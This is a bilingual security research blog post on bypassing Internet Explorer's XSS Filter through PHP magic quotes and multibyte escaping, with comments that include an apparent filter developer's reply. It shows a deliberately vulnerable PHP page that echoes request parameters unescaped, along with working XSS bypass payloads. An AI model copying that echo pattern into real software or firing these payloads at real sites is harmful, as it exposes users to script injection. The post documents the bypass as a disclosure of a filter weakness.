PHP魔术引号导致IE XSS Filter bypass

作者/Sogili(@jackmasa)
首发/Insight-labs.org

在一些web容器中会对一些特殊字符做转换处理,这中间ie xss filter开发人员任何地方对它的了解有疏忽,都很可能导致bypass.

在php中,如果开启了”魔术引号”特性(magic_quotes_gpc = On),则 (single-quote), (double quote), \ (backslash) 和 NULL 字符将都会被反斜杠转义(%00 =>\0).

通过一些测试,我发现ie xss filter对NULL字符的转义处理并不感冒,意思是它并不了解这种转换过程.

1. xss.php demo source code:


<?php echo $_GET['x']?>
<script type="text/javascript">
var x="<?php echo $_GET['z']?>"
</script>

2. HTML bypass case:
<script>alert(1)</script> :(
<script/%00%00%00%00%00>alert(1)</script> :(
%00%00v%00%00<script>alert(1)</script> :(
<script/%00%00v%00%00>alert(1)</script> :D

tips:
1. 绕过字符必须出现在拦截规则中,例如拦截<script>就可以是<script [here]>.

3. Javascript bypass case:
“;alert(1)// :(
%c0″;alert(%00)// :)
%c0″;//(%0dalert(1)// :(
%c0″;//(%0dalert(1)// :(
%c0″;//(%00%0dalert(1)// :(
%c0″//(%000000%0dalert(1)// :D

tips:
1. 需要通过多字节问题吃掉一个\.
2. //(%000000%0d是用于绕过函数调用的拦截规则.

如果你有更多的想法或者小技巧,欢迎与我联系交流@jackmasa

####English Version:

Author/Sogili(@jackmasa)
Post/Insight-labs.org

Basically some special characters in the web container to do the conversion process,if developers mistake concept in the process,it might be bypass IE XSS Filter.

In PHP, if website enable magic_quote_gpc = On in php.ini , as we known (single-quote), (double quote), \ (backslash) and NULL characters are backslash as an escape (%00 => \0).

For my pentesting of the bypass IE Xss Filter, I feel the IE developers are don’t interest in IE Xss Filter against NULL characters are backslash ( \ ) escape character, I mean they aren’t depthly understanding of the conversion process.

1. xss.php demo source code:


<?php echo $_GET['x']?>
<script type="text/javascript">
var x="<?php echo $_GET['z']?>"
</script>

2. HTML bypass case:
<script>alert(1)</script> :(
<script/%00%00%00%00%00>alert(1)</script> :(
%00%00v%00%00<script>alert(1)</script> :(
<script/%00%00v%00%00>alert(1)</script> :D

tips:
1.bypass the characters must be appears in intercept rules of IE Xss Filter , for example: intercept <script> also can be <script [here]>.

3. Javascript bypass case:
“;alert(1)// :(
%c0″;alert(%00)// :)
%c0″;//(%0dalert(1)// :(
%c0″;//(%0dalert(1)// :(
%c0″;//(%00%0dalert(1)// :(
%c0″//(%000000%0dalert(1)// :D

tips:
1.Need through multi-byte problem close a backslash ( \ )
2. //(%000000%0d is used to bypass the function intercept rules.

Feel free to contact me with @jackmasa

  1. Hi Jack, it’s worth taking a look at: http://blogs.msdn.com/b/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx

    This one falls into category #3. Given the deprecated status of PHP magic quotes (http://php.net/manual/en/security.magicquotes.php) and the IE XSS filter’s stated design philosophy, I would not expect to see changes to the filter attempting to account for the PHP magic quote behavior.

    This is cool research in any case! If you have questions or feedback on the filter in the future, please don’t hesitate to get in touch with me via the contact link on my blog.

  2. 看了你的文章,请问这个bypass 怎么攻击。

  3. 跨站测试与利用中的绕过技术 | Insight-labs - pingback on October 22, 2012 at 11:20 am

Leave a Comment



Verify Code   If you cannot see the CheckCode image,please refresh the page again!

Trackbacks and Pingbacks: